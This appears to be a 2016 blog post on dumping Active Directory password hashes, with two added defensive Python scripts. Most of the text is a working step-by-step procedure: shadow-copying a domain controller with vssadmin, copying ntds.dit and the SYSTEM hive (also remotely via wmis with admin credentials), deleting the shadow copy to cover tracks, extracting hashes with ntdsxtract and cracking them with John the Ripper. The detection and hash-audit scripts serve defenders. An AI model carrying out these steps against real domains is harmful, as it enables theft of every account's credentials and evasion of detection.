........................................
on a domain Controller using a privileged account:
C:\ vssadmin list shadows
none. okay.
* where's ntds.dit ? take note.
C:\Windows\NTDS\ntds.dit
* make a system dir
C:\ mkdir C:\Windows\system
* make a shadow copy of C:\
C:\ vssadmin create shadow /for=C:
you should see:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
C:\Users\administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}
Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: domain-dc1.domain
Service Machine: domain-dc1.domain
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers,
Differential
* next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.
that would be from the shadow volume NTDS location to, say, C:\
C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\
1 file(s) copied.
* copy SYSTEM hive
C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\
1 file(s) copied.
* let's cover our tracks and prevent others from grabbing dit and SYSTEM
C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250
........................................
a linux interlude... if you have admin creds
and do not have access to a console and do
not want to have access to a console
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# apt-get install wmis
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c vssadmin list shadows > c:\output.txt"
# cat /root/mnt/output.txt
look for the Shadow Copy Volume name; that is the path under which you'll find ntds.dit and SYSTEM
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"
# ls /root/mnt
ntds.dit SYSTEM
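Everything in the two sections above leaves a trail in process-creation logging: vssadmin creating a shadow, files being read out of a HarddiskVolumeShadowCopyN device path, the shadow being deleted afterwards, and, for the wmis route, cmd.exe spawned by the WMI provider host instead of a console. The script below is an added example for the defender's side, not code from the original post; it matches those stages in command lines of the kind found in Windows Security event 4688 or Sysmon event 1 and rates each host. The records, host names, the C:\temp destination and the WmiPrvSE.exe parent rule are constructed for the example.

```python
"""Flag the shadow-copy credential-theft pattern in process-creation logs.

Added example, not from the original post: scans command lines for the
stages shown in the post (vssadmin list/create/delete, ntds.dit and the
SYSTEM hive copied out of a HarddiskVolumeShadowCopyN path) and rates
each host. All records below are constructed.
"""
import re
from collections import defaultdict

# One regex per stage; case-insensitive because cmd.exe and vssadmin are.
STAGES = {
    "shadow_list": re.compile(r"\bvssadmin(?:\.exe)?\s+list\s+shadows\b", re.I),
    "shadow_create": re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_copy": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\Windows\\NTDS\\ntds\.dit", re.I),
    "system_copy": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\SYSTEM\b", re.I),
    "shadow_delete": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
}

# Parent process names that mean the command arrived over WMI rather than
# from an interactive console (the wmis route). Assumption for this example.
REMOTE_PARENTS = {"wmiprvse.exe"}


def classify(cmdline):
    """Return the set of stage names that a single command line matches."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}


def analyze(records):
    """Group matching records by host and rate them.

    records: iterable of dicts with keys "host", "parent", "cmdline".
    Returns {host: {"stages": [...], "remote": bool, "severity": str}}.
    """
    per_host = defaultdict(lambda: {"stages": set(), "remote": False})
    for rec in records:
        stages = classify(rec["cmdline"])
        if not stages:
            continue
        entry = per_host[rec["host"]]
        entry["stages"] |= stages
        if rec.get("parent", "").lower() in REMOTE_PARENTS:
            entry["remote"] = True

    findings = {}
    for host, entry in per_host.items():
        s = entry["stages"]
        # Reading ntds.dit or SYSTEM out of a shadow path is the decisive step.
        # Create followed by delete with nothing copied in between is still
        # unusual for a console session and worth a look.
        if "ntds_copy" in s or "system_copy" in s:
            severity = "high"
        elif "shadow_create" in s and "shadow_delete" in s:
            severity = "medium"
        else:
            severity = "low"
        findings[host] = {"stages": sorted(s), "remote": entry["remote"],
                          "severity": severity}
    return findings


# Constructed sample records mirroring the commands in the post (hosts,
# parents and the C:\temp destination are made up for the example).
SAMPLE_RECORDS = [
    {"host": "domain-dc1", "parent": "cmd.exe", "cmdline": "vssadmin list shadows"},
    {"host": "domain-dc1", "parent": "cmd.exe", "cmdline": "vssadmin create shadow /for=C:"},
    {"host": "domain-dc1", "parent": "cmd.exe",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp"},
    {"host": "domain-dc1", "parent": "cmd.exe",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp"},
    {"host": "domain-dc1", "parent": "cmd.exe",
     "cmdline": "vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250"},
    {"host": "app-02", "parent": "cmd.exe", "cmdline": "vssadmin.exe create shadow /for=C:"},
    {"host": "app-02", "parent": "cmd.exe", "cmdline": "vssadmin.exe delete shadows /all"},
    {"host": "fileserver1", "parent": "backupagent.exe", "cmdline": "vssadmin create shadow /for=D:"},
    {"host": "ws-07", "parent": "WmiPrvSE.exe",
     "cmdline": r"cmd.exe /c vssadmin list shadows > c:\output.txt"},
    {"host": "ws-07", "parent": "explorer.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for host, f in sorted(analyze(SAMPLE_RECORDS).items()):
        print(f"{host}: {f['severity']:<6} remote={f['remote']} stages={f['stages']}")
```

Note that event 4688 only carries the command line when the "Include command line in process creation events" policy is enabled; without it (or Sysmon) the copy and delete stages are invisible and only the vssadmin process name remains to match on.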
........................................
linux ubuntu/debian rig
install base packages:
# apt-get install cifs-utils autoconf automake autopoint libtool pkg-config
offline processing tools:
libesedb
# git clone https://github.com/libyal/libesedb.git
# cd libesedb/
# ./synclibs.sh
# ./autogen.sh
# ./configure
# make && make install
# ldconfig <- load library
creddump
# git clone https://github.com/moyix/creddump.git
ntdsxtract
# git clone https://github.com/csababarta/ntdsxtract.git
get cracking!
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# mkdir domain
# cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/
# cd ~/libesedb/esedbtools
# ./esedbexport -t ~/domain ~/domain/ntds.dit
esedbexport 20160924
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
# ls ~/domain.export
datatable.3 <- accounts
hiddentable.4
link_table.5 <- db links
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
# python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM
what does that mean?
dsusers.py <- command
~/domain.export/datatable.3 <- account table
~/domain.export/link_table.5 <- links table
~/temp <- where work is done
--passwordhistory <- we want them all
--passwordhashes <- we want hashes
--lmoutfile ~/domain/lmhash.out <- where to send lm hash
--ntoutfile ~/domain/nthash.out <- where to send nt hash
--pwdformat john <- hash format
--syshive ~/domain/SYSTEM <- system hive
[+] Started at: Thu, 20 Oct 2016 17:47:21 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: /root/domain/lmhash.out
[-] NT hash output filename: /root/domain/nthash.out
[-] Hash output format: john
The directory (/root/temp) specified does not exists!
Would you like to create it? [Y/N]
# ls ~/domain/
lmhash.out
nthash.out
* feed into jtr and use cracked passes to compose a wordlist suitable for nt format
# ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out
note: lm is not compatible with gpu cracking
# ./john --show lmhash.out
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt
# ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out
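Before the lmhash.out and nthash.out files go anywhere near john, the files themselves already answer the questions an audit is really asking. The script below is an added example, not code from the original post, ntdsxtract or john. It assumes the john-format files contain one "account:hash" line per user, with an optional $LM$ or $NT$ prefix on the hash (the sample lines are constructed; only the two sentinel values, the empty LM hash aad3b435b51404eeaad3b435b51404ee and the empty NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, are real). It reports accounts whose LM hash is still stored at all (LM storage should be disabled domain-wide, which is what makes the LM-first cracking step above possible), accounts with a blank NT password, and groups of accounts sharing one NT hash, which shows password reuse without cracking anything.

```python
"""Audit the LM and NT hash files written by dsusers.py before any cracking.

Added example, not from the original post and not part of ntdsxtract or
john. Assumes john-format lines of the form "account:hash" with an
optional $LM$/$NT$ prefix; the sample lines below are constructed.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # stored when LM is disabled or the password is blank
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = frozenset("0123456789abcdef")


def parse_hash_lines(lines):
    """Yield (account, hash) pairs; hashes lower-cased with $LM$/$NT$ stripped.
    Blank lines, comments and lines without a 32-hex-digit hash are skipped."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        h = fields[1].strip()
        for prefix in ("$LM$", "$NT$"):
            if h.upper().startswith(prefix):
                h = h[len(prefix):]
        h = h.lower()
        if len(h) == 32 and set(h) <= HEX32:
            yield fields[0], h


def audit(lm_lines, nt_lines):
    """Return a summary of LM-present, blank-NT and shared-NT accounts."""
    lm = dict(parse_hash_lines(lm_lines))
    nt = dict(parse_hash_lines(nt_lines))
    lm_present = sorted(a for a, h in lm.items() if h != EMPTY_LM)
    blank_nt = sorted(a for a, h in nt.items() if h == EMPTY_NT)
    by_hash = defaultdict(list)
    for account, h in nt.items():
        if h != EMPTY_NT:
            by_hash[h].append(account)
    shared_nt = {h: sorted(accts) for h, accts in by_hash.items() if len(accts) > 1}
    return {
        "accounts": len(nt),
        "lm_present": lm_present,
        "blank_nt": blank_nt,
        "shared_nt": shared_nt,
    }


# Constructed sample files (account names and non-sentinel hashes are made up).
SAMPLE_LM = """\
administrator:aad3b435b51404eeaad3b435b51404ee
svc_backup:$LM$0123456789abcdef0123456789abcdef
jdoe:aad3b435b51404eeaad3b435b51404ee
guest:aad3b435b51404eeaad3b435b51404ee
""".splitlines()

SAMPLE_NT = """\
administrator:$NT$11111111111111111111111111111111
svc_backup:22222222222222222222222222222222
jdoe:11111111111111111111111111111111
guest:31d6cfe0d16ae931b73c59d7e0c089c0
# malformed line that should be ignored
broken:notahash
""".splitlines()

if __name__ == "__main__":
    result = audit(SAMPLE_LM, SAMPLE_NT)
    print(f"{result['accounts']} accounts")
    print("LM hash still stored:", ", ".join(result["lm_present"]) or "none")
    print("blank NT password:", ", ".join(result["blank_nt"]) or "none")
    for h, accts in result["shared_nt"].items():
        print(f"shared NT hash {h[:8]}...: {', '.join(accts)}")
```

Any account that shows up under "LM hash still stored" is the reason the LM-first pass above works: LM upper-cases the password and hashes it in two 7-character halves, so once a single account keeps an LM hash the domain's NoLMHash setting is not doing its job for that account.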
Thursday, October 20, 2016
dumping ad passwords and cracking with jtr
yes, some people use the euphemism "windows domain controller password audit." but, let's
call it what it is: dumping ad and getting password hashes. i'm using jtr.